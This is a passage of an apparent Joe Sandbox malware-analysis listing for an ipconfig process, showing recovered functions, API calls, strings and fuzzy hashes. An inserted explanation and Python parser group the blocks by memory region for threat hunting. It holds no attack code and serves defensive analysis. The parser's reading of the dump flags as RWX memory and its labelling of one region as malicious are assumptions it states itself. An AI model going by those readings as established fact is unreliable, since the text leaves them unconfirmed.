                                                                                                                              • Opcode ID: 544c7d3e81b5da93bc2792753ce727b9bfdd678ea36f58a7a896cd5eca68e4aa
                                                                                                                              • Instruction ID: f0dc56591722103054c90522051a03bc56c1e31ffa5f2bdeb874bd3a3e3ea958
                                                                                                                              • Opcode Fuzzy Hash: 544c7d3e81b5da93bc2792753ce727b9bfdd678ea36f58a7a896cd5eca68e4aa
                                                                                                                              • Instruction Fuzzy Hash: 4801A733A08204BF972177B4EC48B2B36ACD7C23B93240661E926C2590EBA0DC007570
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: 09555a9dbf1718687b01f95abb90a2b52bd9c47a2b8ec8bc209ebd1ff7e78cbb
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction Fuzzy Hash: 7B819C70E05A499BFF2ACEECC8917AEBBA5AF45350F1C42D9D861E7391C7748840CB51
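The two blocks above (the GetFileType block and the __aulldvrm block that follows it) repeat one machine-generated layout: an APIs list, an optional Strings list, the memory dump the function was lifted from, the IDA snapshot, and the Similarity IDs and fuzzy hashes. The parser below is an added example written for this page, not Joe Sandbox code: it turns such blocks into records and groups them by dump base address, so the functions lifted from the PE-backed ipconfig image at 0x00F60000 can be separated from those in the 0x03830000 region and their Instruction Fuzzy Hashes pulled out for hunting. The sample input is transcribed from the two blocks above with the extracted whitespace normalised and the "Download File" link text dropped. Assumptions: the dotted dump-file name is read as PID.run.id.BASE followed by four flag fields (PID and base are confirmed by the snapshot names and Offset values on the page; treating the first flag field as the Win32 page protection, so that 0x40 means PAGE_EXECUTE_READWRITE, is an assumption about the naming convention), and a block is taken to end at its Instruction Fuzzy Hash entry.

```python
"""Parse Joe Sandbox per-function listing blocks into records and group them by memory region.

Added example for this page; not Joe Sandbox code. Layout assumptions are marked inline.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: two blocks transcribed from the listing, whitespace normalised and the
# "Download File" link text removed. The second block has empty APIs/Strings sections.
SAMPLE = """\
APIs
• _fileno.MSVCRT ref: 00F64B4C
• _get_osfhandle.MSVCRT ref: 00F64B53
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,0000054F,00000000,00002908), ref: 00F64B69
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F64B75
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F64B7F
Memory Dump Source
• Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
Similarity
• API ID: ErrorLast$FileType_fileno_get_osfhandle
• String ID:
• API String ID: 3475475711-0
• Instruction Fuzzy Hash: 4801A733A08204BF972177B4EC48B2B36ACD7C23B93240661E926C2590EBA0DC007570
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Instruction Fuzzy Hash: 7B819C70E05A499BFF2ACEECC8917AEBBA5AF45350F1C42D9D861E7391C7748840CB51
"""

API_RE = re.compile(r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<name>[A-Za-z_]\w*)\."
                    r"(?P<module>[A-Za-z0-9_\-]+?)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STR_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<xref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SRC_RE = re.compile(r"^(?P<file>\S+\.sdmp),\s*Offset:\s*[0-9A-Fa-f]+,\s*based on PE:\s*(?P<pe>true|false)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
PAGE_EXECUTE_READWRITE = 0x40  # Win32 page-protection constant


@dataclass
class ApiCall:
    name: str
    module: str
    args: str | None
    ref: int          # call-site address inside the dump
    in_subcall: bool  # listed as "Part of subcall function ..."


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, int]] = field(default_factory=list)
    source_file: str = ""
    pid: int = -1
    base: int = -1
    dump_flags: tuple[str, ...] = ()  # the four dotted fields after the base address, kept raw
    based_on_pe: bool = False
    ids: dict[str, str] = field(default_factory=dict)  # API ID, String ID, hashes, snapshot (last value per key)


def parse_blocks(text: str) -> list[FunctionRecord]:
    """Walk the listing line by line; a block ends at its 'Instruction Fuzzy Hash' entry."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue  # anything that is not a bullet entry is ignored
        if section == "APIs":
            if m := API_RE.match(line):
                cur.apis.append(ApiCall(m["name"], m["module"], m["args"], int(m["ref"], 16), m["sub"] is not None))
        elif section == "Strings":
            if m := STR_RE.match(line):
                cur.strings.append((m["text"], int(m["xref"], 16)))
        elif m := KV_RE.match(line):
            key, val = m["key"].strip(), m["val"].strip()
            if key == "Source File" and (s := SRC_RE.match(val)):
                cur.source_file, cur.based_on_pe = s["file"], s["pe"] == "true"
                f = cur.source_file.split(".")
                # Assumed dump-name layout: PID.run.id.BASE.<four flag fields>.sdmp. PID and BASE
                # match the snapshot names and Offset values in the report; the flags stay raw.
                cur.pid, cur.base, cur.dump_flags = int(f[0], 16), int(f[3], 16), tuple(f[4:8])
            else:
                cur.ids[key] = val
            if key == "Instruction Fuzzy Hash":  # last entry of a block
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records


def region_summary(records: list[FunctionRecord]) -> dict[int, dict]:
    """Group functions by dump base: count, API modules seen, fuzzy hashes, and whether the first
    flag field (assumed here to be the page protection) reads PAGE_EXECUTE_READWRITE."""
    by_base: dict[int, list[FunctionRecord]] = defaultdict(list)
    for r in records:
        by_base[r.base].append(r)
    summary = {}
    for base, funcs in by_base.items():
        protect = int(funcs[0].dump_flags[0], 16) if funcs[0].dump_flags else None
        summary[base] = {
            "functions": len(funcs),
            "api_modules": sorted({a.module for f in funcs for a in f.apis}),
            "rwx": protect == PAGE_EXECUTE_READWRITE,
            "fuzzy_hashes": [f.ids.get("Instruction Fuzzy Hash", "") for f in funcs],
        }
    return summary


if __name__ == "__main__":
    for base, info in region_summary(parse_blocks(SAMPLE)).items():
        print(f"{base:#010x} functions={info['functions']} rwx={info['rwx']} modules={info['api_modules']}")
```

Fed the whole listing (after normalising the extracted whitespace), the 0x03830000 group is the set of functions whose Instruction Fuzzy Hashes are worth comparing against other dumps of this family, while the 0x00F60000 group should be the legitimate ipconfig code. The raw flag fields are kept on each record so the protection assumption can be checked against Joe Sandbox's documentation before the rwx flag is relied on.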
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: c243b4d6104162181b35fff15b27aaa4400d8b8b19f1a1740af0f7151f10e297
                                                                                                                              • Instruction ID: a1dc805ad1b99c2421651dec181d09d7c5f6ebaa043c8bd4f77db4fc6c9ed2d1
                                                                                                                              • Opcode Fuzzy Hash: c243b4d6104162181b35fff15b27aaa4400d8b8b19f1a1740af0f7151f10e297
                                                                                                                              • Instruction Fuzzy Hash: D6215376E0021DABDB50EFA9C840AEFB7FCAF54684F080566E945E7200E770D9118BA1
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToNameW.IPHLPAPI(?,?,00000020), ref: 00F62054
                                                                                                                              • DhcpEnumClasses.DHCPCSVC(00000000,?,?,00000000), ref: 00F62071
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00F620AC
                                                                                                                              • DhcpEnumClasses.DHCPCSVC(00000000,?,?,00000000), ref: 00F620CC
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00F6214C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassesDhcpEnumLocal$AllocConvertFreeInterfaceLuidName
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3187720636-0
                                                                                                                              • Opcode ID: 92ac91d1b84e591a684abd4eb3c5e8753c51ba35caebc26030ca892a48896cc4
                                                                                                                              • Instruction ID: 313a48e87af2a1bb2feb26869d12580d85eabfe89789f33d2830b1ec908c2187
                                                                                                                              • Opcode Fuzzy Hash: 92ac91d1b84e591a684abd4eb3c5e8753c51ba35caebc26030ca892a48896cc4
                                                                                                                              • Instruction Fuzzy Hash: 79419472E04708AFEB10AFE4DD85BAEB779FF54710F140025FA05AB281DAB5AC44A790
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadCompartmentId.IPHLPAPI ref: 00F64641
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              • NsiAllocateAndGetTable.NSI(00000001,00F61350,00000007,?,00000004,?,00000668,00000000,00000000,00000000,00000000,?,00000001), ref: 00F6468B
                                                                                                                              • SetCurrentThreadCompartmentId.IPHLPAPI(?), ref: 00F646A7
                                                                                                                              • SetCurrentThreadCompartmentId.IPHLPAPI(00000000), ref: 00F646DF
                                                                                                                              • NsiFreeTable.NSI(?,?,00000000,00000000), ref: 00F646ED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CompartmentCurrentThread$FreeTable$AllocateFormatLocalMessage__iob_func
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4019950967-0
                                                                                                                              • Opcode ID: 357e52198467b3d47f04bd7b78137996547d36b317489023757f7df3d807eeb8
                                                                                                                              • Instruction ID: 4f0bec3ccf36f5fa070e2190879933b8e427e122323950742c59c5ba1e69ab56
                                                                                                                              • Opcode Fuzzy Hash: 357e52198467b3d47f04bd7b78137996547d36b317489023757f7df3d807eeb8
                                                                                                                              • Instruction Fuzzy Hash: 1711BB31A00218FFD71077E5DC0AE9FBF69EF41B54F000054F515AB091D7B69904E7A1
                                                                                                                              APIs
                                                                                                                              • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00F630B1
                                                                                                                              • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?), ref: 00F630BF
                                                                                                                              • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000400,00000002,?,00000000,?,00000080,?,?), ref: 00F630D9
                                                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000080,?,?), ref: 00F630E5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Time$File$DateErrorFormatLastLocalSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1951311907-0
                                                                                                                              • Opcode ID: 376c4f87dcfd2540db1d0638a221b1e71598e92706af5e24f8ca6673c27c2383
                                                                                                                              • Instruction ID: 53d5a27d785edb07591f8eee8e10b0713b50f9d7107dfb7f03c8be3467b8f098
                                                                                                                              • Opcode Fuzzy Hash: 376c4f87dcfd2540db1d0638a221b1e71598e92706af5e24f8ca6673c27c2383
                                                                                                                              • Instruction Fuzzy Hash: F411A572A04209BFEB249B659C0AFFF7BBCEF45754F000026F602E6180DBB099499670
                                                                                                                              APIs
                                                                                                                              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00F65642
                                                                                                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00F65651
                                                                                                                              • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00F6565A
                                                                                                                              • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00F65663
                                                                                                                              • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00F65678
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1445889803-0
                                                                                                                              • Opcode ID: 7f5968469ebf989c06a761a683ac07c39601ab25d4581d7ca9f4441a2094c26c
                                                                                                                              • Instruction ID: e25d347dace44399bf815227f328f7b5d8096c96893328d18dec7403dafd9bbb
                                                                                                                              • Opcode Fuzzy Hash: 7f5968469ebf989c06a761a683ac07c39601ab25d4581d7ca9f4441a2094c26c
                                                                                                                              • Instruction Fuzzy Hash: F111E871D05209EFCB10DBB8DA4869EB7F5FF58715FA14866D412E7214EB709A00EB50
                                                                                                                              Strings
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038D02E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038D02BD
                                                                                                                              • RTL: Re-Waiting, xrefs: 038D031E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
Strings
• RTL: Resource at %p, xrefs: 038D7B8E
• RTL: Re-Waiting, xrefs: 038D7BAC
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 038D7B7F
Memory Dump Source
• Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
• Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038D728C
Strings
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 038D7294
• RTL: Resource at %p, xrefs: 038D72A3
• RTL: Re-Waiting, xrefs: 038D72C1
Memory Dump Source
• Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
• Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
Memory Dump Source
• Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
• Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
APIs
• ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00F62B76
• ConvertGuidToStringW.IPHLPAPI(?,?,00000027), ref: 00F62B8D
  • Part of subcall function 00F62C01: memset.MSVCRT ref: 00F62C2B
  • Part of subcall function 00F62C01: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00F62C80
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,Dhcpv6ClassId,00000000,?,?,00000200,00000001,?), ref: 00F62BCE
  • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
  • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
  • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
Memory Dump Source
• Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
Similarity
• API ID: ConvertGuid$FormatFreeInterfaceLocalLuidMessageOpenQueryStringValue__iob_funcmemset
• String ID: Dhcpv6ClassId
• API String ID: 2135874933-1235502083
APIs
• ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00F621D5
• ConvertGuidToStringW.IPHLPAPI(?,?,00000027), ref: 00F621EC
  • Part of subcall function 00F62260: memset.MSVCRT ref: 00F6228A
  • Part of subcall function 00F62260: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00F622DF
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DhcpClassId,00000000,?,?,00000200,00000001,?), ref: 00F6222D
  • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
  • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
  • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
Memory Dump Source
• Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
Similarity
• API ID: ConvertGuid$FormatFreeInterfaceLocalLuidMessageOpenQueryStringValue__iob_funcmemset
• String ID: DhcpClassId
• API String ID: 2135874933-3964061114
APIs
• LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(dhcpcsvc.dll,00000000,00000000,00F62577,00000001), ref: 00F61D26
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,DhcpIsEnabled), ref: 00F61D3B
Memory Dump Source
• Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: DhcpIsEnabled$dhcpcsvc.dll
• API String ID: 2574300362-2583171064
APIs
• ConvertInterfaceLuidToNameW.IPHLPAPI(?,00000002,00000020), ref: 00F627D1
• NsiSetAllParameters.NSI(00000001,00000005,00F61368,00000019,?,00000008,00000000,00000000), ref: 00F627ED
• Dhcpv6IsEnabled.DHCPCSVC6(00000002,?), ref: 00F62801
• Dhcpv6AcquireParameters.DHCPCSVC6(00000002), ref: 00F62817
  • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
  • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
  • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
Memory Dump Source
• Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
Similarity
• API ID: Dhcpv6Parameters$AcquireConvertEnabledFormatFreeInterfaceLocalLuidMessageName__iob_func
• String ID:
• API String ID: 1181060623-0
APIs
  • Part of subcall function 00F65478: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00F6547F
• __set_app_type.MSVCRT ref: 00F64ED2
• __p__fmode.MSVCRT ref: 00F64EE8
• __p__commode.MSVCRT ref: 00F64EF6
• __setusermatherr.MSVCRT ref: 00F64F17
Memory Dump Source
• Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
                                                                                                                              • Opcode ID: 4cd3ad99bc448b2c8c45323b88318fbf7165e3cc08d250b4fc58530acbe37a88
                                                                                                                              • Instruction ID: db4d73739848f4af2ee3472b681e893e6058b63542f00c329424b09f180a0786
                                                                                                                              • Opcode Fuzzy Hash: 4cd3ad99bc448b2c8c45323b88318fbf7165e3cc08d250b4fc58530acbe37a88
                                                                                                                              • Instruction Fuzzy Hash: 9FF0ACB05087089FD714BF70EC5A6183B70B746B26F10465AE475D63F1DFBA9480FA10
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
• Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: fa486182bd620e0096d8accd4e76c2fe85d0db188e416b682e07463daa3ec64b
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: 4A91A770E00A199BFF24DFDDC8806BEB7A5AF44720F18459AF965E72C4E7708A40D761
Strings
Memory Dump Source
• Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
• Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: aa900a1ada2428272a5a300aeed29fcf809ed606449d0121831cce1115bf6736
• Instruction ID: 7b4218671e1397a1f3e53e2703fa1f8071d0257c4f1039c49685972bc292b695
• Opcode Fuzzy Hash: aa900a1ada2428272a5a300aeed29fcf809ed606449d0121831cce1115bf6736
• Instruction Fuzzy Hash: D7812875D002699BDB21DB94CC44BEEB7B8AF48710F0445EAE919F7280E7309E84CFA1
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 038ECFBD
Strings
Memory Dump Source
• Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
• Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
